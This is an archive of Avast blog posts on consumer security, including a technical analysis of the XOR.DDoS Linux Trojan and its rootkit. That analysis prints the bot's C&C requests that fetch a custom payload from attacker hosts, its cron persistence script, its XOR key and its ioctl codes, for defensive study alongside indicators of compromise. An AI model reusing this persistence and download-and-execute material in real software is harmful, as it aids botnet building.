Category Archives: Avast

Avast

What to do before your smart phone is lost

Avast Anti-theft tracks lost phones remotelyBe prepared.

That’s good advice for hosting a Super Bowl party, going to a job interview, or if you lose your phone.

Not being prepared could prove disastrous in all three of those examples, but most people would agree that losing their phone with all the contacts, text messages, photos, and other irreplaceable data is worse than forgetting the Doritos or not answering an interview question well.

If you happen to lose your Android smart phone or tablet, or if someone steals it from you, do not despair. Our clever, FREE app, Avast Anti-theft, will help you find your phone and even, catch the thief.antitheft infographic

What is Avast Anti-Theft?

 

Avast Anti-Theft is a free standalone application designed for Android smart phones and tablets. It’s main purpose is to help you locate your lost or stolen mobile device, allowing you to track it on a map and control it remotely. Since Anti-Theft is a separate application from Avast Mobile Security & Antivirus, it is completely invisible when it is running so that thieves don’t even know it’s there.

This infographic explains what you can do with your phone if you discover that it’s missing.

 

Locate your device on a map

Remotely locate your phone via GPS, Wi-Fi, or mobile network – for maximum accuracy.

 

Remotely lock your phone

Remotely lock your phone to prevent access to your personal data and settings.

 

Activate a siren remotely

Activate a loud, customizable siren, which reverts to maximum volume if thieves try to silence it.

 

If you spring for the paid version of Avast Anti-Theft, you get some additional, powerful features.

 

Take a photo of a would-be thief

You can set your device to lock access and take a picture of the person attempting to unlock it after three failed tries.

 

Remote data retrieval from your device

Retrieve call logs, SMS messages, and other personal data from your phone.

Avast Anti-Theft is available on Google Play, where it can be downloaded for free.

Lizard Squad hackers use unsecured home routers in DDoS attacks

This Lizard is out to get your home router.

This Lizard is out to get your home router.

Your home router could be part of a network used to knock sites like Sony PlayStation network offline.

During Christmas we reported that a hacker group calling themselves the Lizard Squad, took responsibility for ruining the day for Sony PlayStation and Microsoft Xbox users by taking the gaming networks offline. This and previous attacks, which included a bomb threat directed at an American Airlines flight with Sony Entertainment president John Smedley on board, have been revealed to be a marketing campaign to advertise a new product available for rent to anyone who wants to cause a Denial-of-Service (DDoS) attack to the target of their choice.

I’m not a hacker. Why should I care?

You may not be a hacker, but the power for this service could be coming from your home office! Security blogger, Brian Krebs, whose own site was attacked, found out that the network of infected devices that powers the Product-That-Must-Not-Be-Named (that’s because Lizard Squad gleefully thanked Brian for the publicity on their Twitter account) is made up mostly of compromised home routers. On that same Twitter account, Lizard Squad said that they are using 250-500k infected routers.

These are the devices in everyone’s home that we warned you about in our blog, Your home network is at risk of cybersecurity attacks. Most people neglect the security of these devices by using the default user name and password that comes from the manufacturer out-of-the-box.

Our research determined that nearly 80% of all home routers in use today are thinly protected by common, easily hacked passwords, making routers an easy entry point to the home network for hackers,” said Avast Software’s CEO, Vincent Steckler.

Lizard Squad has just proven that point.

Today’s router security situation is very reminiscent of PCs in the 1990s, with lax attitudes towards security combined with new vulnerabilities being discovered every day creating an easily exploitable environment, “ Steckler said. “The main difference is people have much more personal information stored on their devices today than they did back then. Consumers need strong yet simple-to-use tools that can prevent attacks before they happen.”

How to protect your home router

Start by scanning you home network with Avast’s Home Network Security Solution.

Open the Avast user interface, click Scan from the menu on the left, then choose Scan for network threats. Avast will take a look at your router and report back any issues. In most cases, if there is an issue to be addressed, then it will direct you to your router manufacturer’s website.

The Home Network Security Solution is available in free and paid versions of Avast 2015. Get it at www.avast.com.

For more steps you can take to protect your home router, please see our blog post, 12 ways to boost your router’s security.

Posting a privacy notice on Facebook is useless

An old hoax has been resurrected after Facebook made a recent announcement about its updated privacy policy. The copyright message claims to protect users’ pictures, information, and posts under UCC 1-308- 1 1 308-103 and the Rome Statute. It’s seems so official; it just must be true, right? Here is an example that I saw on my newsfeed this morning.

Facebook privacy permission statement is useless

Other variations have come through in the past few days with legal-sounding statements, like this:

“In response to the new Facebook guidelines, I hereby declare that my copyright is attached to all of my personal details, illustrations, comics, paintings, professional photos and videos, etc. (as a result of the Berner Convention)….”

The good news is that Facebook users are becoming more aware of privacy issues, and they seek a way to control their own shared media. The bad news is that this notification has no legal standing at all, you are bound to the terms and conditions that you agreed to when you signed up with Facebook, and you are annoying your friends.

The truth is that YOU own all of the content and information you post on Facebook, and YOU can control how it is shared through your privacy and application settings. If you neglect to look at those settings, you grant Facebook a non-exclusive, transferable, sub-licensable, royalty-free, worldwide license to use any content that you post on or in connection with Facebook.

In tomorrow’s blog, we will share the top 3 areas in Facebook where you need to make sure the privacy is set to your liking.

More cybersecurity predictions for 2015

Yesterday, we looked at two hot areas to be aware of regarding your online security: Data breaches and mobile security. Today, we’ll look at two more areas that haven’t caused as much trouble or damage as the other two, but are likely to grow in importance.

Internet of (Every)Thing at risk

Secure your privacy by using avast! SecureLine VPNThe “smart” home has been in the works for some time now, and this year, we’ll see more and more gadgets from household appliances to wearables like fitness bracelets to industrial equipment becoming connected to mobile devices and social networks. This proliferation of inter-connected things will open up a whole new glorious space for hackers to play in.

We predict that from now on, devices will increase by an order of magnitude (not too bold a prediction, huh?), and of course, that will result in greater privacy and security concerns. A breach in the Internet of Things (IoT) will give cybercrooks the ability to install malware or ransomware on private networks – not only consumer, but corporate and government – steal personal information, or even cause physical harm to a space or a person.  But before you run around the yard yelling, “Skynet is falling, Skynet is falling”, we will see adware uploaded on our smart TVs.

What to keep your eye out for

  • New technologies and businesses around the IoT including

o   Increased demand for low cost bandwidth and processing

o   Expansion of infrastructure that carries Wi-Fi traffic

o   Start-ups focused on communication and sensors between devices, storage, data analytics

o   Home and factory automation

  • The rise of “fog” computing architectures, where data is closer to the source as opposed to residing in a data center somewhere

Room for improvement

  • Keeping multiple smart devices updated with the latest version of this-and-that software. You think it’s hard now with a couple of devices? Wait until your house, body, garage, and workplace are full of smart gadgets.
  • The fractured ecosystem will make it harder to identify threats or protect against security exploits.
  • Home routers are still unsecure and people are using open, unencrypted Wi-Fi. Start by securing your own home router by scanning with Avast’s Home Network Security scan, then follow whatever suggestions are given.

Social media world

ransomware note
By now, social media users know that sharing too much personal information can give strangers access to their personal life. To illustrate that point on a national scale, Allstate Insurance, aired a series of commercials about what happened to a couple who shared on social networks that they were away from their home for the weekend. Read about it on our blog.

Last year, we saw new privacy settings introduced on social media, and 2015 will see a rise in anonymous interactions via social media.

Hoaxes and scams spread by email and social networks were successful in 2014, as they have been for years now, so we see no reason that occurrences will decrease. Social engineering can trick unwitting victims and the rate of identity theft will increase.

What to keep your eye out for

  • Continuation of scams associated with important events like celebrity gossip or sporting events.
  • Watching videos on Facebook equaled watching videos on YouTube at the end of 2014, so we can expect hackers to take advantage of this by hiding malicious links in Facebook videos.
  • More fraudulent and malicious ads will appear on social networks.
  • Ransomware made the jump from PC to mobile in 2014, and it will likely hit social networks.

Room for improvement

    • Cut back on sharing too much on social media and through Internet of Things devices.

Adjust privacy settings in each social network.

Linux DDoS Trojan hiding itself with an embedded rootkit

10867127_1516649011939387_257681840_nAt the end of September 2014, a new threat for the Linux operating system dubbed XOR.DDoS forming a botnet for distributed denial-of-service attacks was reported by the MalwareMustDie! group. The post mentioned the initial intrusion of SSH connection, static properties of related Linux executable and encryption methods used. Later, we realized that the installation process is customized to a victim’s Linux environment for the sake of running an additional rootkit component. In this blog post, we will describe the installation steps, the rootkit itself, and the communication protocol for getting attack commands.

Installation Script & Infection Vector

The infection starts by an attempt to brute force SSH login credentials of the root user. If successful, attackers gain access to the compromised machine, then install the Trojan usually via a shell script. The script contains procedures like main, check, compiler, uncompress, setup, generate, upload, checkbuild, etc. and variables like __host_32__, __host_64__, __kernel__, __remote__, etc. The main procedure decrypts and selects the C&C server based on the architecture of the system.

In the requests below, iid parameter is the MD5 hash of the name of the kernel version. The script first lists all the modules running on the current system by the command lsmod. Then it takes the last one and extracts its name and the parameter vermagic. In one of our cases, the testing environment runs under “3.8.0-19-generic SMP mod_unload modversions 686 “, which has the MD5 hash equal to CE74BF62ACFE944B2167248DD0674977. 

Three GET requests are issued to C&C. The first one is performed by the check procedure (note the original misspelling):

request:
GET /check?iid=CE74BF62ACFE944B2167248DD0674977&kernel=3.8.0reply:
1001|CE74BF62ACFE944B2167248DD0674977|header directory is exists!

Then compiler procedure issues another GET request in which parameters like C&C servers, version info, etc, are passed to the server where they are compiled into a newly created executable:

request:
GET /compiler?iid=CE74BF62ACFE944B2167248DD0674977&username=admin
&password=admin&ip=103.25.9.245:8005%7C103.240.141.50:8005%7C
66.102.253.30:8005%7Cndns.dsaj2a1.org:8005%7Cndns.dsaj2a.org:8005%7C
ndns.hcxiaoao.com:8005%7Cndns.dsaj2a.com:8005
&ver=3.8.0-19-generic%5C%20SMP%5C%20mod_unload%5C%20modversions%5C%20686%5C%20
&kernel=3.8.0
reply:
1001|CE74BF62ACFE944B2167248DD0674977|header directory is exists!

Finally, the third GET request downloads the customized version of the Trojan’s binary in the form of a gzip archive, which is unpacked and executed:

request:
GET /upload/module/CE74BF62ACFE944B2167248DD0674977/build.tgz
reply:
1001|CE74BF62ACFE944B2167248DD0674977|create ok

The previous steps run only in the case that there already  is a built version for the current kernel version on the server side. If not, the script locates the kernel headers in /lib/modules/%s/build/ directory, where %s means the return value after calling the command uname with parameter r,  then packs all files and uploads them to the C&C server using a custom uploader called mini. The steps of the first scenario follows.

The rootkit component is a loadable kernel module (LKM). To install it successfully on a system, the vermagic value of LKM needs to agree with the version of the kernel headers installed on the user’s system. That’s the motivation behind previous installation steps. If previous sequences fail, the script installs a Trojan omitting the rootkit component.

Structure & Persistence

The binary structure of the main executable is as follows:

elf_xorddos_scheme

The persistence of the Trojan is achieved in multiple ways. First, it is installed into the /boot/ directory with a random 10-character string. Then a script with the identical name as the Trojan is created in the /etc/init.d directory. It is together with five symbolic links pointing to the script created in /etc/rc%u.d/S90%s, where %u runs from 1 to 5 and %s is substitute with the random. Moreover, a script /etc/cron.hourly/cron.sh is added with the content:

#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin’
for i in `cat /proc/net/dev|grep :|awk -F: {‘,27h,’print $1′,27h,’}`; do ifconfig $i up& done
cp /lib/udev/udev /lib/udev/debug
/lib/udev/debug

The line “*/3 * * * * root /etc/cron.hourly/cron.sh” is inserted in the crontab.

The functionality of the main executable lies in three infinite loops responsible for 1. downloading and executing instructions in a bot’s configuration file, 2. reinstalling itself as the /lib/udev/udev file,  and 3. performing flooding commands. The configuration file contains four categories of lists: md5, denyip, filename and rmfile and mean killing a running process based on its CRC checksum, on the active communication with an IP from the list, on a filename, and finally removing a file with a specified name. In the next figure, a fragment of the config file is displayed (known filenames connected with competing flooding Trojans are highlighted):

elf_config

The lists of processes to kill or remove before its own installation is typical for flooding Trojans.

Also we have to note that there is a variant of this Trojan compiled for the ARM architecture. This suggests that the list of potentially infected systems (besides 32-bit and 64-bit Linux web servers and desktops) is extended for routers, Internet of Things devices, NAS storages or 32-bit ARM servers (however, it has not been observed in the wild yet). It contains an additional implementation of the download-and-execute feature in an infinite loop called daemondown:

elf_decconf_arm

A few days ago, a new 32-bit variant of this Trojan with few modifications was observed. The bot is installed as /lib/libgcc4.so file, the unique file containing its identification string (see later) was /var/run/udev.pid, the initialization script was /etc/cron.hourly/udev.sh and the rootkit features were completely omitted. The presence of all these files could serve as an indicator of compromise (IoC).

LKM Rootkit

Trojans for the Windows platform have used various rootkit features for a very long time. It is known that some trojanized flooding tools had the Windows variant utilizing the Agony rootkit (its source code has been publicly shared and available since 2006).  We presented research related to these malicious DDoS tools at Botconf 2014 in a survey called Chinese Chicken: Multiplatform-DDoS-Botnets. Now there is a flooding Trojan for Linux that also contains an embedded rootkit. It’s main functionality is to hide various aspects of the Trojan’s activity and is provided by procedures in the switch table:

elf_rootkit_jumptable

The Trojan running in the userspace requests these features from the rootkit in the kernel by ioctl command with a specific code (0×9748712). The presence of the rootkit is first checked by opening a process with the name rs_dev:

elf_rootkit_ioctl

The own request needs two parameters: One specifies the number of the command to be performed by the rootkit, and the other one is the number of the port to be hidden. Below is an example of how the Trojan hides the TCP port (notice the task value 3):

elf_rootkit_hideport

Based on the procedure names, it is likely that the malware authors were inspired by the open source project called Suterusu to build up their rootkit. The Trojan from last year called Hand of Thief failed in its ambitions to be the first banking Trojan for Linux desktops.  It also borrowed part of its code from an existing open source project, namely methods of process injection. The description of the project says “An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM”. Another article related to Suterusu was published in January 2013.

C&C communication

The communication is encrypted in both directions with the same hard-coded XOR key (BB2FA36AAA9541F0) as the configuration file. An additional file /var/run/sftp.pid containing an unique magic string of length 32 bytes is stored and utilized as an unique identifier of a victim’s machine within the communication. There is a list of C&C commands, for which the bot listens to: To start flooding, to stop flooding, to download-and-execute, to self-update, to send the MD5 hash of its memory, and to get list of processes to kill:

elf_commands_jump_table

The list of C&Cs is stored in the shell script in the __remote__ variable. The Trojan first sends information about the running system to the C&C server (very likely to be displayed on a panel of a botnet operator). The replies usually arrived in a form of a command. The header of the command is 0x1C bytes long and is stored within a structure called Header. The first command is to stop any flooding attack and the next one to start one with the list of hosts provided. The entries of the Header are shown below. Highlighted parameters are the size of the total size of a command (Size, 0x102C), the task number (Order, 0×3, i.e. _cmd_start in the switch table), and the number of flooding tasks (Task_Num, 0xF):

elf_header_flood_from_c2

The rest of the flooding command contains an encrypted structure with attack tasks. After decryption, we can see an IP address (red color) and ports (green color) which will be flooded by the Trojan and other parameters of the DDoS attack (e.g. grey color decides the type of  attack:  SYN/DNS).

elf_command_victims

Acknowledgement

Thanks to my colleague, Jaromír Hořejší, for cooperation on this analysis. Pop-art was created by the independent digital artist Veronika Begánová.

Sources

Here are the samples connected with the analysis:

Install script BA84C056FB4541FE26CB0E10BC6A075585
990F3CE3CDE2B49475022AD5254E5B
BV:Xorddos-B [Trj]
Xorddos Uploader 44153031700A019E8F9E434107E4706A705
F032898D3A9819C4909B2AF634F18
ELF:Xorddos-J [Trj]
Xorddos Trojan for EM_386 AD26ABC8CD8770CA4ECC7ED20F37B510E
827E7521733ECAEB3981BF2E4A96FBF
ELF:Xorddos-A [Trj]
Xorddos Trojan for EM_x86_64 859A952FF05806C9E0652A9BA18D521E57
090D4E3ED3BEF07442E42CA1DF04B6
ELF:Xorddos-A [Trj]
Xorddos Rootkit 6BE322CD81EBC60CFEEAC2896B26EF015D
975AD3DDA95AE63C4C7A28B7809029
ELF:Xorddos-D [Rtk]
Xorddos Trojan for EM_ARM 49963D925701FE5C7797A728A044F09562
CA19EDD157733BC10A6EFD43356EA0
ELF:Xorddos-I [Trj]
Xorddos Trojan no rootkit 24B9DB26B4335FC7D8A230F04F49F87B1F
20D1E60C2FE6A12C70070BF8427AFF
ELF:Xorddos-K [Trj]

Data breaches and more 2015 cyber security predictions

For a month now, I have been reading predictions for 2015. In the security field, something new and unexpected can always pop up – like the Point-of-Sale (PoS) breaches in early 2014 – but most likely what will happen is just a continuation, that is, a natural evolution, of what has already occurred.

crystal ball 1

So let’s take a look at some things that will probably happen this year and steps we can take to stay safer. Tomorrow, we’ll look at a few more.

Data breaches will continue

Data breaches made the news in 2014, and in 2015 we will continue to see security breaches of companies, irrespective of size or business sector. These breaches are often caused by software vulnerabilities, advances in data stealing malware, and as we have seen recently with the Sony breach, by states using cyber espionage against other states.

What to keep your eye out for

  • Heartbleed and Shellshock were successful at using vulnerabilities in software that we depend upon. We expect to see more of the same in 2015.
  • Increase in phishing and social engineering attacks on employees of big companies in order to break in.
  • Health care organizations are at risk because many of them use outdated software and have rudimentary security. Plus, there is so much valuable data to be stolen like sensitive patient records.
  • More revelations that governments and even companies are using cyber attacks against each other.

PoS-attacks2Room for improvement

  • Companies need to tighten up the security processes of their employees, vendors, and third party suppliers who have access to their systems.
  • Companies need to adopt advanced threat solutions to secure their PoS networks from breaches.
  • Enterprise breach detection methods need to be improved because cybercrooks will likely go after the bigger fish.
  • Passwords are not adequate protection for our personal or financial accounts. Two-factor authentication will be adopted more widely, as will new methods like ultra-sonic sound.
  • Consumers and companies should update from the old, vulnerable Windows XP.

Mobile is attractive to cybercrooks

Since our mobile phones are as powerful and can accomplish nearly all the things a regular computer can, that gives cybercrooks a relatively easy in-road to your private data and financial information. 2015 will see consumers becoming more aware of mobile security since they will increasingly use mobile apps that contain sensitive banking, financial, and personal health information. 

What to keep your eye out for

  • Increase in phishing attacks of mobile users. It’s worked successfully so far, so hackers will keep employing methods to trick employees or vendors into revealing login credentials like usernames or passwords, or installing malicious software. Targets will be more high profile.
  • iOS security breach on a wider scale. As companies allow executives and employees to use their own handsets, iPhones will become a more lucrative target. Add to that the iCloud Drive sync, ApplePay, and all those fancy new wearable gadgets, and cybercrooks have new attack vectors to explore for the future.
  • After the success of the stolen celebrity photos, the cloud has become a pretty interesting target for cybercrooks. Think of all the information we store in the cloud – especially company info. iCloud, Dropbox, Google Drive, and other cloud technologies are vulnerable.
  • Compromised Wi-Fi networks will lead to interception and redirection of mobile traffic like voice and SMS using Man-in-the-Middle attacks.

Room for improvement

  • Bring-your-own-device to the workplace means that IT security folks need to take a hard, long look at their policies or more data could be at risk.
  • Businesses need to work on a Mobile Security defense plan, or run the risk of

exposing the entire organization to threats.

  • Security for mobile apps needs to increase. Developers will agree on a way to secure the app’s code as well as the user’s data accessed by their application.
  • Comsumers will take responsibility for their devices security by installing software like Avast Mobile Security and Anti-theft.

 

We like the ‘Oversharing on social media’ message aired during Sugar Bowl

In last night’s broadcast of the Sugar Bowl, a showdown of two power-house college football teams in the USA, Allstate Insurance, aired a series of brilliant commercials about the risk of over-sharing on social networks. The social media team at Avast has been preaching this message for a while now, so we were happy to see this clever series of advertisements.

The ads are about a couple who shared on social networks that they were away from their house, actually attending the game. Allstate’s “Mayhem” character took advantage of this knowledge and broke into their unoccupied house, and proceeded to have a “MayhemSale” of all their possessions. “Buy Matt & Shannon’s stuff now at MayhemSale.com,” he announced, then soon after took to Twitter to sell off items one-by-one. I immediately visited the website, but apparently there were so many other interested people, that it kept crashing.

Burglars can easily search Facebook or Twitter for targeted keywords or see who has checked into airport lounges on Foursquare. According to FBI statistics, summertime is the most active for burglaries and oversharing can tip off thieves to your absence. Homeowners should be extra vigilant about protecting their goods.

Our advice – be extremely cautious what you share on social media, and wait until after you are back to share your vacation pictures.

 

Happy New Year 2015 from Avast!

From our headquarters in Prague, Czech Republic to our offices in the USA, Germany, China, and South Korea, all of us at Avast Software wish you love, laughter, and peace in 2015.

img-holiday-neo-2015-en-c

Looking back on 2014, we are grateful for the trust that our 220 million customers have placed in us. We thank you for your loyalty and for sharing Avast with your friends and family. We appreciate your support, your suggestions and feedback (even when it’s not so good ;) ), the way you help others on our forum and social channels like Facebook, Google +, and Twitter, and especially when you write us with your stories of how Avast saved the day for you.

As we enter this new year, we promise to bring you the best security products for your home network, your business, your PCs, Macs, and Android devices, that we can. We will stay on top of new threats and contain the old ones that keep coming back to plague us. We will strive to keep your trust, but most of all, to keep you and your important data and hardware save from harm.

So raise your glass with us, and join us for our 2015 wish.

Peace. Love. Security. ~ from Avast

img-Fb_wall-2015

 

‘Worst virus ever’ POSTCARD hoax still circulating

[AUDIO VERSION: This is an audio version of this blog post. Click below to listen.]

During the Christmas holidays, my mother received this email from a well-meaning friend. Since her daughter works for the most trusted security company in the world, she immediately asked me about the authenticity of the message.

Here’s the email:

Subject: VIRUS COMING !

Hi All,

PLEASE FORWARD THIS WARNING AMONG FRIENDS, FAMILY AND CONTACTS!

You should be alert during the next few days. Do not open any message

with an attachment entitled POSTCARD FROM HALLMARK , regardless of who sent it to you.

It is a virus which opens A POSTCARD IMAGE, which ‘burns’ the whole

hard disc C of your computer.

This virus will be received from someone who has your e -mail address

in his/her contact list.

This is the reason you need to send this e -mail to all your contacts.

It is better to receive this message 25 times than to receive the virus

and open it.

If you receive an email entitled “POSTCARD,” even though it was sent to

you by a friend, do not open it! Shut down your computer immediately.

This is the worst virus announced by CNN.

It has been classified by Microsoft as the most destructive virus ever.

This virus was discovered by McAfee yesterday, and there is no repair

yet for this kind of Virus.

This virus simply destroys the Zero Sector of the Hard Disc, where the

vital information is kept.

COPY THIS E-MAIL AND SEND IT TO YOUR FRIENDS.

REMEMBER: IF YOU SEND IT TO THEM, YOU WILL BENEFIT ALL OF US

This particular email has been around for years, and you have probably seen one of its incarnations. Although there are real incidents of malware being distributed via e-cards, this is a bogus, unsubstantiated hoax.

shutterstock_20061535The language is quite strong – phrases like the worst virus and the most destructive virus ever are sure to get the attention of security-minded people. The problem is that the email fails to provide any authentic details to learn more about the threat, just vague announcements and classifications.

“The email doesn’t actually mention a specific virus,” said Jan Zika, an Avast Virus Lab analyst. “Sure some viruses use the “Postcard” social engineering method to trick users to click the link, but this email has been circulating for a couple of years now, and it never says which virus it is.”

The email does say what the virus can do, This virus simply destroys the Zero Sector of the Hard Disc, where the vital information is kept, and it burns the whole hard disc C of your computer. Pretty scary stuff!

“No, it cannot burn anything, and no, it is not most destructive virus ever,” said Zika. His advice? “It’s best to avoid such messages unless you can confirm that the threat is real.”

Protect yourself against email hoaxes

  • Keep you antivirus protection up-to-date and scan regularly for viruses and malware. Both Avast Internet Security and Avast Premier include anti-spam filters to keep your inbox free of this kind of nonsense.
  • Use caution when opening attachments or downloading files. Double check that it’s from a sender you know and trust.
  • Before clicking on any links or attachments, try to verify that the email came from a legitimate source. If you can’t, then don’t click.